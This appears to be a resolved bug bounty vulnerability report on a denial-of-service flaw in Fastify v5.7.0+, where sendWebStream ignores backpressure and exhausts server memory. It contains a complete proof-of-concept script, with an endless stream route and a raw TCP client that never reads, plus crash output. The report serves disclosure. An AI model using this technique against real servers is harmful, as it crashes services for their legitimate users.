DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored
# Denial of Service (DoS) via Unbounded Memory Allocation in `sendWebStream` (Backpressure Ignored)
## Weakness
**CWE-770**: Allocation of Resources Without Limits or Throttling
## Severity
**High (7.5)**
* **Vector String**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
* **Attack Vector**: Network
* **Attack Complexity**: Low
* **Privileges Required**: None
* **User Interaction**: None
* **Availability**: High
## Summary
I have discovered a high-severity Denial of Service (DoS) vulnerability in Fastify **v5.7.0 and later**. The issue lies in the `sendWebStream` function in `lib/reply.js`, which was recently introduced to support native Web Streams.
The implementation fails to handle TCP backpressure correctly. When a `ReadableStream` is sent as a response, Fastify continuously pulls data from the stream producer (`controller.enqueue`) and writes it to the response object (`res.write`). However, it **ignores the return value of `res.write()`**.
In a healthy system, `res.write()` returns `false` when the internal buffer is full, signaling that the producer should pause (backpressure). Because Fastify ignores this signal and immediately schedules the next read, a fast producer (e.g., a file stream or generated data) connected to a slow or stalled client will fill the server's memory indefinitely.
An attacker can exploit this by initiating a request to an endpoint that returns a Web Stream and simply **not reading the response**. This forces the server to buffer the entire stream in memory, leading to an Out-Of-Memory (OOM) crash.
## Steps To Reproduce
To reproduce this vulnerability, you need a Fastify server version 5.7.0 or higher.
1. Create a new folder and install `fastify`:
```bash
mkdir fastify-oom-poc
cd fastify-oom-poc
npm init -y
npm install fastify@latest
```
2. Create a file named `reproduce_oom.js` with the following content:
```javascript
'use strict'

const Fastify = require('fastify')
const { ReadableStream } = require('node:stream/web')
const { connect } = require('node:net')

// Initialize Fastify
const fastify = Fastify({ logger: false })

// Define a route that returns an infinite stream using Web Streams
fastify.get('/stream', (req, reply) => {
  const stream = new ReadableStream({
    pull (controller) {
      // Push a 1MB chunk.
      // A correct implementation would pause when the response buffer is full.
      // In Fastify v5.7.0+, this keeps getting called indefinitely.
      controller.enqueue(Buffer.alloc(1024 * 1024, 'a'))

      // Log memory usage to demonstrate the leak
      if (Math.random() < 0.05) {
        const usage = process.memoryUsage().rss / 1024 / 1024
        console.log(`[Server] Memory usage: ${usage.toFixed(2)} MB`)
      }
    }
  })
  return reply.send(stream)
})

async function run () {
  try {
    await fastify.listen({ port: 0 })
    const port = fastify.server.address().port
    console.log(`Server listening on port ${port}`)
    console.log('Connecting malicious client...')

    // Create a client that connects but never reads the response body
    const client = connect(port, 'localhost', () => {
      // Send minimal HTTP request headers
      client.write('GET /stream HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n')
    })

    // CRITICAL: we intentionally do NOT add a 'data' listener to the client.
    // This causes the TCP window to close, signaling backpressure.
    // Fastify ignores this signal and keeps buffering data in RAM.
    client.on('error', (err) => console.error('Client error:', err))
    console.log('Client connected and paused. Watching server memory usage...')
  } catch (err) {
    console.error('Error starting server:', err)
    process.exit(1)
  }
}

run()
```
3. Run the reproduction script:
```bash
node reproduce_oom.js
```
**Observed Result:**
Memory usage is printed to the console and rises rapidly until the process crashes with an out-of-memory error:
```text
Server listening on port 36451
Connecting malicious client...
Client connected and paused. Watching server memory usage...
[Server] Memory usage: 105.42 MB
[Server] Memory usage: 520.18 MB
[Server] Memory usage: 1540.66 MB
[Server] Memory usage: 2890.12 MB
<--- Last few GCs --->
[1234:0x5678] 15000 ms: Mark-sweep 4000.5 (4100.0) -> 4000.2 (4100.0) MB, 0.1 / 0.0 ms (average mu = 0.123, current mu = 0.012) allocation failure; scavenge might not succeed
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
```
## Supporting Material/References
The vulnerability is in `lib/reply.js` in the `sendWebStream` function.
```javascript
// Vulnerable implementation in Fastify v5.7.x
function onRead (result) {
  if (result.done) {
    // ...
    return
  }
  // VULNERABILITY: the return value of res.write() is ignored!
  res.write(result.value)
  // The next read happens immediately, regardless of buffer state
  reader.read().then(onRead, onReadError)
}
```
## Impact
**Denial of Service (DoS)**: A single attacker with a standard network connection can crash the Fastify server by targeting any endpoint that returns a Web Stream. This shuts down the service for all legitimate users and may incur restart costs or downtime. No authentication or special privileges are required.
Report Stats
- Report ID: 3524779
- State: Closed
- Substate: resolved
- Upvotes: 3